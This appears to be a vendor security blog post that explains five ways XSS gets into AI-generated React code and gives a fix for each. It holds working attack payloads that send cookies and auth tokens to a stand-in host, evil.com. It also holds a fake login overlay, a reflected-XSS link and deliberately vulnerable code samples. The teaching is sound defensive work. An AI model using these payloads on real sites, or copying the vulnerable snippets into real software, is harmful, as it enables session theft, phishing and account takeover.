Cross-Site Scripting in React: Why dangerouslySetInnerHTML Actually Is Dangerous
React's JSX escaping protects you from most XSS — until your AI coding assistant reaches for dangerouslySetInnerHTML, user-controlled href attributes, or unescaped markdown rendering. Here's how XSS shows up in AI-generated React code and how to fix every pattern.
React is supposed to protect you from XSS
And it mostly does. React's JSX auto-escapes every value you embed in curly braces. Write <p>{userInput}</p> and React converts <script>alert('xss')</script> into harmless text. No execution. No injection. It just renders the literal characters on the page.
This is why React developers feel safe from cross-site scripting. They've heard it a hundred times: "React escapes by default." And that's true — for the default case.
But the default case isn't the only case. There are at least five patterns where React's built-in escaping doesn't help. And every one of them is a pattern that AI coding assistants generate regularly, because they solve real problems: rendering rich text, displaying markdown, building dynamic links, handling CMS content.
Your AI isn't generating these patterns to be reckless. It's generating them because you asked for something that requires raw HTML, and raw HTML is where XSS lives.
XSS in thirty seconds
Cross-site scripting (XSS) is when an attacker injects executable code — usually JavaScript — into your application, and your application runs it in another user's browser. The attacker's code runs with full access to that user's session: cookies, tokens, local storage, everything.
The impact ranges from annoying (pop-up alerts) to catastrophic (session hijacking, data theft, account takeover). XSS is OWASP A03:2021 — Injection, and it remains one of the most common web vulnerabilities year after year.
React's auto-escaping is the reason XSS is less common in modern React apps than in jQuery-era applications. But "less common" is not "impossible."
Why React is usually safe
React's JSX does something clever. When you write:
const userInput = '<img src=x onerror="alert(document.cookie)">';
return <div>{userInput}</div>;
React doesn't insert that string as HTML. It creates a text node. The browser renders the literal characters <img src=x onerror="alert(document.cookie)"> as visible text. No element is created. No event handler fires.
This is the default for every {} expression in JSX. It handles <script> tags, event handlers, SVG payloads, and every other HTML injection vector — as long as you stay within JSX's normal rendering path.
The five patterns below are all ways to leave that path.
Pattern 1: dangerouslySetInnerHTML
This is the most obvious bypass, and the one AI reaches for most often. React named it dangerouslySetInnerHTML as a warning. AI coding assistants treat it as a standard API.
When AI generates it
You ask: "Display rich text content from my CMS." Or: "Render the HTML body of a blog post." Or: "Show a user's formatted bio." The AI responds with:
// VULNERABLE — AI-generated CMS content renderer
function BlogPost({ post }) {
return (
<article>
<h1>{post.title}</h1>
<div dangerouslySetInnerHTML={{ __html: post.body }} />
</article>
);
}
This works. The rich text renders with all its formatting — bold, italics, links, images. The AI tested the happy path and moved on.
The attack
If post.body contains user-contributed content — comments, bios, forum posts, any field a user can edit — an attacker submits:
<img src=x onerror="fetch('https://evil.com/steal?cookie='+document.cookie)">
Or more subtly:
Nice post!<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:9999">
<h2>Session expired. Please log in again.</h2>
<form action="https://evil.com/phish"><input name="email" placeholder="Email">
<input name="password" type="password" placeholder="Password">
<button>Log in</button></form></div>
The first payload steals cookies. The second creates a pixel-perfect phishing form overlaid on your app. Both execute the moment any user views the page.
The fix
Sanitize the HTML before rendering it. DOMPurify is the standard library for this:
npm install dompurify
npm install -D @types/dompurify # if using TypeScript
// FIXED — sanitize before rendering
import DOMPurify from "dompurify";
function BlogPost({ post }) {
const cleanHTML = DOMPurify.sanitize(post.body);
return (
<article>
<h1>{post.title}</h1>
<div dangerouslySetInnerHTML={{ __html: cleanHTML }} />
</article>
);
}
DOMPurify strips script tags, event handlers, javascript: URLs, and every other XSS vector while preserving safe formatting tags like <b>, <em>, <a> (with safe href values), and <img> (without event handlers).
For server components in Next.js, use isomorphic-dompurify or sanitize on the server with sanitize-html:
// Server component alternative
import sanitizeHtml from "sanitize-html";
function BlogPost({ post }) {
const cleanHTML = sanitizeHtml(post.body, {
allowedTags: sanitizeHtml.defaults.allowedTags.concat(["img"]),
allowedAttributes: {
a: ["href", "target"],
img: ["src", "alt"],
},
});
return (
<article>
<h1>{post.title}</h1>
<div dangerouslySetInnerHTML={{ __html: cleanHTML }} />
</article>
);
}
Pattern 2: User-controlled href attributes
JSX escapes content, not attribute semantics. When a user controls the href of a link, React will faithfully render whatever protocol they provide — including javascript:.
When AI generates it
You ask: "Let users add their website URL to their profile." The AI writes:
// VULNERABLE — user-controlled href
function UserProfile({ user }) {
return (
<div>
<h2>{user.name}</h2>
<a href={user.website}>Visit website</a>
</div>
);
}
The attack
A user sets their website to:
javascript:fetch('https://evil.com/steal?token='+localStorage.getItem('auth_token'))
Anyone who clicks "Visit website" executes that JavaScript in their own browser. No broken HTML, no script tags — just a link that looks normal in the UI.
Even data: URIs can be dangerous:
data:text/html,<script>alert(document.cookie)</script>
The fix
Validate URLs before rendering them as href values. Only allow http: and https: protocols:
// FIXED — validate URL protocol
function sanitizeUrl(url: string): string {
try {
const parsed = new URL(url);
if (parsed.protocol === "http:" || parsed.protocol === "https:") {
return url;
}
return "#";
} catch {
return "#";
}
}
function UserProfile({ user }) {
return (
<div>
<h2>{user.name}</h2>
<a href={sanitizeUrl(user.website)}>Visit website</a>
</div>
);
}
The URL constructor handles edge cases like JAVASCRIPT: (case variations), URL encoding, and malformed inputs. If the URL isn't valid HTTP or HTTPS, replace it with #.
Pattern 3: Unescaped markdown rendering
Markdown is everywhere in AI-generated apps — README viewers, note-taking apps, documentation pages, chat interfaces with formatted messages. AI reaches for markdown libraries and often skips sanitization.
When AI generates it
You ask: "Render user comments as markdown." The AI installs marked and writes:
// VULNERABLE — unsanitized markdown
import { marked } from "marked";
function Comment({ text }) {
const html = marked(text);
return <div dangerouslySetInnerHTML={{ __html: html }} />;
}
The attack
Markdown supports inline HTML. A user submits:
Great article! Really enjoyed the section on React.
<img src=x onerror="document.location='https://evil.com/steal?c='+document.cookie">
Looking forward to the next one.
The markdown parser converts this to HTML, preserving the <img> tag with the malicious event handler. dangerouslySetInnerHTML drops it straight into the DOM. The onerror fires because src=x fails to load.
Even without explicit HTML, some markdown renderers support dangerous constructs:
[Click here](javascript:alert(document.cookie))
The fix
There are two approaches. Either sanitize the HTML output of the markdown parser, or use a parser that produces React elements directly instead of HTML strings.
Option A: Sanitize the output
// FIXED — sanitize markdown output
import { marked } from "marked";
import DOMPurify from "dompurify";
function Comment({ text }) {
const rawHTML = marked(text);
const cleanHTML = DOMPurify.sanitize(rawHTML);
return <div dangerouslySetInnerHTML={{ __html: cleanHTML }} />;
}
Option B: Use react-markdown (no dangerouslySetInnerHTML needed)
// BEST — render markdown as React elements
import ReactMarkdown from "react-markdown";
function Comment({ text }) {
return <ReactMarkdown>{text}</ReactMarkdown>;
}
react-markdown parses markdown into an AST and renders React components — no intermediate HTML string, no dangerouslySetInnerHTML. By default, it doesn't render raw HTML blocks from the input. This is the safest approach because XSS is architecturally impossible without explicitly enabling the rehype-raw plugin.
If you do need to support HTML inside markdown (some CMS content requires it), use rehype-raw with rehype-sanitize:
import ReactMarkdown from "react-markdown";
import rehypeRaw from "rehype-raw";
import rehypeSanitize from "rehype-sanitize";
function CMSContent({ body }) {
return (
<ReactMarkdown rehypePlugins={[rehypeRaw, rehypeSanitize]}>
{body}
</ReactMarkdown>
);
}
Pattern 4: Server-side rendering injection
This pattern is less common but more devastating. It appears when AI generates server-side code that interpolates user data into raw HTML strings — bypassing React's rendering pipeline entirely.
When AI generates it
You ask: "Create an API route that returns an HTML email preview." Or: "Generate an Open Graph meta tag with the user's name." The AI writes:
// VULNERABLE — SSR string interpolation
// app/api/preview/route.ts
export async function GET(request: Request) {
const url = new URL(request.url);
const title = url.searchParams.get("title") || "Untitled";
return new Response(
`<!DOCTYPE html>
<html>
<head><title>${title}</title></head>
<body>
<h1>${title}</h1>
<p>Preview of your page</p>
</body>
</html>`,
{ headers: { "Content-Type": "text/html" } }
);
}
The attack
This is classic reflected XSS. An attacker crafts a URL:
https://yourapp.com/api/preview?title=<script>document.location='https://evil.com/steal?c='+document.cookie</script>
They send this link to a victim. The victim clicks it. The server renders the script tag directly into the HTML response. The browser executes it. The attacker has the victim's cookies.
This bypasses React entirely because the HTML is built as a string, not through JSX. React's auto-escaping never gets a chance to help.
The fix
Escape HTML entities in any user input that goes into server-rendered HTML strings:
// FIXED — escape HTML entities
function escapeHtml(str: string): string {
return str
.replace(/&/g, "&")
.replace(/</g, "<")
.replace(/>/g, ">")
.replace(/"/g, """)
.replace(/'/g, "'");
}
export async function GET(request: Request) {
const url = new URL(request.url);
const rawTitle = url.searchParams.get("title") || "Untitled";
const title = escapeHtml(rawTitle);
return new Response(
`<!DOCTYPE html>
<html>
<head><title>${title}</title></head>
<body>
<h1>${title}</h1>
<p>Preview of your page</p>
</body>
</html>`,
{ headers: { "Content-Type": "text/html" } }
);
}
Or better: avoid raw HTML strings entirely. Use React's renderToString for server-rendered content — it auto-escapes the same way JSX does in the browser.
Pattern 5: eval() and dynamic script injection
This is the most dangerous pattern, and the one that experienced developers find most surprising when AI generates it. The AI uses eval() for dynamic features or creates <script> elements from user input.
When AI generates it
You ask: "Build a calculator component" or "Let users create custom dashboard formulas." The AI reaches for eval:
// VULNERABLE — eval with user input
function Calculator() {
const [expression, setExpression] = useState("");
const [result, setResult] = useState<number | null>(null);
const calculate = () => {
try {
setResult(eval(expression));
} catch {
setResult(null);
}
};
return (
<div>
<input
value={expression}
onChange={(e) => setExpression(e.target.value)}
placeholder="Enter expression: 2 + 2"
/>
<button onClick={calculate}>Calculate</button>
{result !== null && <p>Result: {result}</p>}
</div>
);
}
Or it creates script elements dynamically:
// VULNERABLE — dynamic script injection
function EmbedWidget({ config }) {
useEffect(() => {
const script = document.createElement("script");
script.innerHTML = `
window.widgetConfig = ${JSON.stringify(config)};
initWidget(window.widgetConfig);
`;
document.body.appendChild(script);
}, [config]);
return <div id="widget-container" />;
}
The attack
With eval, any input becomes executable code:
fetch('https://evil.com/steal?token='+localStorage.getItem('auth_token'))
With the script injection pattern, if config contains user-controlled data with a crafted payload, JSON.stringify can be escaped in certain edge cases, or the config values themselves can be designed to break out of the JSON context.
The fix
For math expressions, use a safe parser like mathjs:
// FIXED — safe expression evaluation
import { evaluate } from "mathjs";
function Calculator() {
const [expression, setExpression] = useState("");
const [result, setResult] = useState<number | null>(null);
const calculate = () => {
try {
const parsed = evaluate(expression);
setResult(Number(parsed));
} catch {
setResult(null);
}
};
return (
<div>
<input
value={expression}
onChange={(e) => setExpression(e.target.value)}
placeholder="Enter expression: 2 + 2"
/>
<button onClick={calculate}>Calculate</button>
{result !== null && <p>Result: {result}</p>}
</div>
);
}
mathjs evaluates mathematical expressions without executing arbitrary JavaScript. No fetch, no DOM access, no code execution — just math.
For widget configuration, pass data through data- attributes or React state instead of injecting scripts:
// FIXED — pass config without script injection
function EmbedWidget({ config }) {
const containerRef = useRef<HTMLDivElement>(null);
useEffect(() => {
if (containerRef.current) {
// Call the widget API directly, don't inject scripts
initWidget(containerRef.current, config);
}
}, [config]);
return <div ref={containerRef} />;
}
Why AI generates these patterns
AI coding assistants generate all five patterns for the same reason: they solve the problem you described.
You asked for rich text rendering, and dangerouslySetInnerHTML renders rich text. You asked for a user profile link, and <a href={user.website}> creates a link. You asked for markdown, and marked renders markdown. Every generated solution is functionally correct.
The AI optimizes for "does this work?" It doesn't model what happens when a malicious user submits crafted input. It doesn't think about what an onerror handler on an <img> tag does. It sees a pattern — display HTML content, create links, render markdown — and produces the most common implementation from its training data.
That training data includes millions of tutorials, Stack Overflow answers, and blog posts. Many of them show these patterns without sanitization, because the tutorial author was focused on teaching the feature, not defending against attacks.
The result: code that works perfectly in development and is exploitable in production.
Prevention checklist
Here's how to protect your React app from XSS, whether the code was AI-generated or hand-written.
1. Audit every use of dangerouslySetInnerHTML
grep -rn "dangerouslySetInnerHTML" --include="*.tsx" --include="*.jsx" .
Every result needs a sanitization call before the HTML reaches the DOM. If there's no DOMPurify.sanitize() or equivalent, it's a potential XSS vector.
2. Audit every dynamic href, src, and action attribute
grep -rn 'href={' --include="*.tsx" --include="*.jsx" .
grep -rn 'src={' --include="*.tsx" --include="*.jsx" .
grep -rn 'action={' --include="*.tsx" --include="*.jsx" .
Any attribute that takes a URL and uses user-controlled data needs protocol validation. Only allow http: and https:.
3. Check your markdown pipeline
If you use marked, remark, markdown-it, or any markdown library, verify that the output is either sanitized with DOMPurify or rendered through react-markdown without rehype-raw.
4. Set Content Security Policy headers
CSP is your safety net. Even if an XSS payload makes it into the DOM, a strong CSP can prevent it from executing:
// next.config.js — basic CSP
const securityHeaders = [
{
key: "Content-Security-Policy",
value: [
"default-src 'self'",
"script-src 'self'",
"style-src 'self' 'unsafe-inline'",
"img-src 'self' data: https:",
"connect-src 'self' https://your-api.com",
].join("; "),
},
];
script-src 'self' blocks inline scripts and eval(). This single directive neutralizes most XSS payloads even if your code has vulnerabilities.
5. Never use eval()
grep -rn "eval(" --include="*.tsx" --include="*.jsx" --include="*.ts" --include="*.js" .
grep -rn "new Function(" --include="*.tsx" --include="*.jsx" --include="*.ts" --include="*.js" .
If you find either, replace it. eval() has no safe use case when processing user input.
How Flowpatrol catches XSS
Flowpatrol tests for XSS the way an attacker would. It submits payloads into every input field, URL parameter, and form on your app — then checks whether those payloads execute in the rendered page. It catches dangerouslySetInnerHTML without sanitization, javascript: URLs in links, unescaped markdown output, and reflected XSS in server-rendered responses.
The same patterns covered in this article. Automated. Across every page of your app.
Paste your URL. Get a report. Fix what matters.
XSS is classified under OWASP A03:2021 — Injection. For more on injection attacks in AI-generated code, see SQL Injection Is Not Dead. For the full picture of what AI-generated apps get wrong, see Top 10 Vulnerabilities in Vibe-Coded Apps.